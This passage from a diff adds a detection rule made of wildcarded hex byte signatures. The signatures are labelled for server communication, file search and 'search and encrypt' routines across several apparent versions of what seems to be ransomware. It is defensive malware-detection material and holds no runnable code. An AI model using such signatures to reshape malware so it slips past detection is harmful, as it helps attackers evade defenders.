+            ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 52 FF 15 ?? ?? ?? ?? 8B F8 A1 ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 8B 14
+            85 ?? ?? ?? ?? 51 53 52 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 F8 ?? 53 53 6A ?? 53 53 73 23 8B 04 85 ?? ?? ?? ?? 6A ?? 50
+            57 FF 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 53 53 53 8D 4C 24 ?? 8B F0 51 EB 24 8B 14 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 57 FF
+            15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 53 53 8B F0 53 8D 44 24 ?? 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C
+        }
+		$server_communication_0_3_1_2 = {
+            24 ?? ?? ?? ?? 53 51 8B E8 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 55 89 5C 24 ?? FF 15 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 54 24 ?? 52 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 55 FF 15 ?? ?? ?? ?? 8D 8C
+            24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 8D 54 24 ?? 68 ??
+            ?? ?? ?? 52 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 89 5C 24 ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ??
+            ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B 4C 24 ?? 51 E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 55 FF D3
+        }
+		$server_communication_0_3_3_1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 50 ?? 8A 08 83 C0 ?? 84 C9 75
+            F7 2B C2 75 0D 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 55 56 57 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 C6 44 24 ?? ?? E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 33 C0
+            83 C4 ?? 50 50 50 50 52 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F8 89 7C 24 ?? 33 F6
+            EB 04 8B 7C 24 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 E8 ??
+            ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 56 51
+            8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52
+            50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 51
+            52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ??
+            ?? 8D 44 24 ?? 83 C4 ?? 8D 48 ?? 8A 10 83 C0 ?? 84 D2 75 F7 2B C1 8D 54 24 ?? 52 8D 8C 24 ?? ?? ?? ?? 51 50 8D 54 24
+        }
+		$server_communication_0_3_3_2 = {
+            52 E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 04 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 4C 24
+            ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 FE ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 7D 23 8B 14 B5 ?? ?? ?? ?? 6A ?? 52
+            57 FF D3 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8B F8 6A ?? 8D 44 24 ?? 50 EB 3C 8B 0C B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 57 FF
+            D3 8B 14 B5 ?? ?? ?? ?? 52 8B F8 8B 04 B5 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
+            8D 4C 24 ?? 51 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 6A ?? 52 8B E8 C6 84 24 ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 55 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85
+            C0 75 32 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 55 FF 15 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 55 8B 2D ?? ?? ?? ?? FF D5
+        }
+		$server_communication_0_3_4a_1 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 C6 44 24 ??
+            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 0D 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 55 56 57 6A ?? 8D 54 24 ?? 6A ?? 52 E8 ?? ??
+            ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F8 89 7C 24 ?? 33 F6 EB
+            04 8B 7C 24 ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 6A ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 6A ?? 52 E8 ?? ??
+            ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 51 8B 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D
+            ?? ?? ?? ?? 56 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50
+            A1 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24
+            ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 52 8D 84 24 ?? ?? ?? ?? 50 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4
+            ?? 50 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 04 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68
+        }
+		$server_communication_0_3_4a_2 = {
+            8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 FE ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 7D 23 8B 14 B5 ??
+            ?? ?? ?? 6A ?? 52 57 FF D3 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8B F8 6A ?? 8D 44 24 ?? 50 EB 3C 8B 0C B5 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 51 57 FF D3 8B 14 B5 ?? ?? ?? ?? 52 8B F8 8B 04 B5 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
+            6A ?? 6A ?? 6A ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 6A ?? 52 8B E8
+            C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 55 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 85 C0 75 32 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 55 FF 15 ?? ?? ?? ?? 8D 94 24 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 18 55 8B 2D ?? ?? ?? ?? FF D5 57 FF D5 83 C6 ?? 83 FE ?? 0F 8C CE
+            FD FF FF 8B 44 24 ?? 50 FF 15
+        }
+		$server_communication_0_3_5a_1 = {
+            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 57 68 ?? ?? ?? ?? 8D 44
+            24 ?? 6A ?? 50 C6 44 24 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 C6 84 24 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 83 C4 ?? 8D 50 ?? 8B FF 8A 08 83 C0 ?? 84 C9 75 F7 2B C2 75 05 E8 ?? ?? ?? ?? 33 C0 50 50 50 50
+            68 ?? ?? ?? ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 33 DB 68 ?? ?? ?? ?? 8D 54 24 ?? 6A ??
+            52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83
+            C4 ?? 51 8B 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 53 51 8B 0D ?? ?? ?? ?? 51 8B 0D ??
+            ?? ?? ?? 51 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 6A ?? 68 ??
+            ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44 24 ??
+            83 C4 ?? 8D 70 ?? 8B FF 8A 08 83 C0 ?? 84 C9 75 F7 8D 94 24 ?? ?? ?? ?? 2B C6 52 8D 7C 24 ?? 8D 4C 24 ?? E8 ?? ?? ?? ??
+            8D 8C 04 ?? ?? ?? ?? 8B F7 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 B8 ?? ?? ?? ?? E8
+        }
+		$server_communication_0_3_5a_2 = {
+            8B 14 9D ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 83 FB ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 7D 20 6A ?? 52 50 FF 15 ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 4C 24 ?? 8B F0 51 EB 39 68 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? 8B 0C 9D ??
+            ?? ?? ?? 8B 14 9D ?? ?? ?? ?? 51 6A ?? 52 8B F0 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 44 24 ?? 50
+            68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 8B F8 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 57 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 32 8D 54
+            24 ?? 52 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ??
+            ?? 83 C4 ?? 85 C0 75 18 57 8B 3D ?? ?? ?? ?? FF D7 56 FF D7 83 C3 ?? 83 FB ?? 0F 8C CD FD FF FF 8B 54 24 ?? 52 FF 15
+        }
+		$server_communication_2_0_4e = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 83 3D ?? ??
+            ?? ?? ?? 53 56 57 75 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? A1 ??
+            ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? B8 ?? ?? ??
+            ?? 8D 50 ?? 33 DB 8A 08 40 3A CB 75 ?? 2B C2 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
+            8C 24 ?? ?? ?? ?? 53 51 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 68
+            ?? ?? ?? ?? FF 15
+        }
+		$search_and_encrypt_2_0_4e_1 = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 5D ?? 56
+            57 33 C0 68 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 33 D2 68 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 66 89 95 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 53 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ??
+            ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ??
+            ?? 50 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B F0 89 B5 ?? ?? ?? ?? 83 FE ?? 0F 84
+        }
+		$search_and_encrypt_2_0_4e_2 = {
+            0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? B8 ?? ??
+            ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ??
+            83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51
+            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ??
+            ?? ?? ?? 53 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8
+        }
+		$search_and_encrypt_2_0_4e_3 = {
+            8B C3 83 C4 ?? 8D 50 ?? 90 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 83 F8 ?? 76
+            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D
+            ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51
+            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84
+        }
+		$search_and_encrypt_2_0_4e_4 = {
+            8D 8D ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ??
+            66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0
+            0F 84 ?? ?? ?? ?? 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ??
+            52 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83
+            C4 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8
+        }
+		$search_and_encrypt_2_0_4e_5 = {
+            8D 85 ?? ?? ?? ?? 83 C4 ?? 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 8D 95 ??
+            ?? ?? ?? D1 F8 52 8D 78 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 57 56 E8 ?? ?? ?? ?? 8B 3D
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D7 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 FF D7 83
+            C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 FF D7 83 C4 ?? 85 C0 75 ?? 8B C6 E8 ?? ?? ?? ??
+            83 F8 ?? 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ??
+            83 C4 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 56 FF 15
+        }
+		$server_communication_4_0_1 = {
+            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24
+        }
+		$server_communication_4_0_2 = {
+            8A 08 40 3A CB 75 ?? 2B ?? 50 8D ?? ?? ?? ?? ?? ?? [0-2] E8 ?? ?? ?? ?? 83 C4 04 8D
+            ?? 24 ?? ?? ?? ?? ?? (8B ??|8D ?? 24 ?? ?? ?? ??) ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ??
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 C4 08 8D ?? 01 [0-7] 8A 08 40 3A CB
+            75 ?? 2B ?? 8B C8 8D 51 ?? 83 E2 ?? B8 ?? ?? ?? ?? 2B C2 50 50 8D 7C 01 ?? 8D 84 0C
+            ?? ?? ?? ?? 50 E8
+        }
+		$server_communication_4_0_3 = {
+            83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 51 8D 94 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? ?? ?? [1-2]
+            8D ?? 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? [0-3] 51 E8 ?? ?? ?? ??
+            8B 15 ?? ?? ?? ?? 83 C4 ?? 8B ?? 8B 42 ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 BA ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 83 C4 ?? 52 E8 ?? ?? ?? ?? 83 C4
+            ?? 33 ?? 89 ?? 24 ?? 6A ?? 8D 44 24 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? B8
+            ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 84 24 ??
+            ?? ?? ?? 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ??
+            ?? 53 52 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? ?? 8B ?? 83 C4 ?? 8D 50
+        }
+		$file_search_4_0_1 = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 33 C0 68
+            ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 68 ??
+            ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 66 89 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? 6A ?? 51 E8
+        }
+		$file_search_4_0_2 = {
+            74 ?? FF 15 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 52 EB ?? FF 15 ?? ?? ?? ?? 50 68 ?? ??
+            ?? ?? A1 ?? ?? ?? ?? 8B 48 ?? 51 8D 95 ?? ?? ?? ?? 52 BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ??
+            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 8B F0 C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
+            ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 FF D0 83 FF ?? 0F 85 ?? ?? ?? ?? 83 3D ?? ?? ??
+            ?? ?? 74 ?? 8B 0D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8B 51 ?? 8D 85 ?? ?? ?? ?? 50 52
+            8D 85 ?? ?? ?? ?? 50 EB ?? 8B 15 ?? ?? ?? ?? 8B 42 ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ??
+            ?? ?? 50 8D 8D
+        }
+		$file_search_4_0_3 = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 6A ?? 6A ?? 6A ??
+            6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 6A ?? FF D0 85 C0 0F 84 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 4D ?? 5F 33
+            CD 33 C0 5E E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$file_search_4_1b_1 = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 08 83 C4 ?? 68 ?? ??
+            ?? ?? 8D 95 ?? ?? ?? ?? 52 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15
+        }
+		$file_search_4_1b_2 = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 56 8B F8 FF 15 ?? ?? ?? ?? 83 FF ??
+            0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 48 ?? 8D 95 ?? ?? ?? ?? 52
+            51 8D 95 ?? ?? ?? ?? 52 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B 3D ?? ??
+            ?? ?? 8B 1D
+        }
+		$file_search_4_1b_3 = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 8D 55 ?? 52 6A ?? 6A ?? 6A ?? 6A ?? B8 ?? ?? ??
+            ?? 6A ?? 66 89 45 ?? 89 45 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? C7 45 ?? ?? ?? ?? ??
+            FF D3 85 C0 74 ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$server_communication_4_1b_1 = {
+            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8
+        }
+		$server_communication_4_1b_2 = {
+            E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 42 ?? 83 C4 ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            89 44 24 ?? 3B C3 75 ?? ?? ?? B8 ?? ?? ?? ?? ?? 8B E5 5D C2 ?? ?? 68 ?? ?? ?? ?? 8D
+            ?? 24 ?? ?? ?? ?? 53 51 E8 ?? ?? ?? ?? 0F B6 ?? ?? ?? ?? ?? 0F B6 ?? ?? ?? ?? ?? 0F
+            B6 ?? ?? ?? ?? ?? 83 C4 0C
+        }
+		$server_communication_4_1b_3 = {
+            8A 08 ?? ?? ?? 75 ?? 2B C6 50 57 8D ?? 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50
+            8B CF 51 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 C4 ?? 8D 78 ?? 8A 08 40
+            3A CB 75 ?? 2B C7 8B C8 8D 51 ?? 83 E2 ?? B8 ?? ?? ?? ?? 2B C2 50 50 8D 7C 01 ?? 8D
+            84 0C ?? ?? ?? ?? 50 E8
+        }
+		$server_communication_4_1b_4 = {
+            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 3B C3 76 ?? 8B 94 24
+            ?? ?? ?? ?? 50 52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            84 24 ?? ?? ?? ?? 3B C3 76 ?? 8B 8C 24 ?? ?? ?? ?? 50 51 8D 94 24 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4C 24 ?? 53 53 6A ?? 53 53 6A ?? 8D 84 24 ??
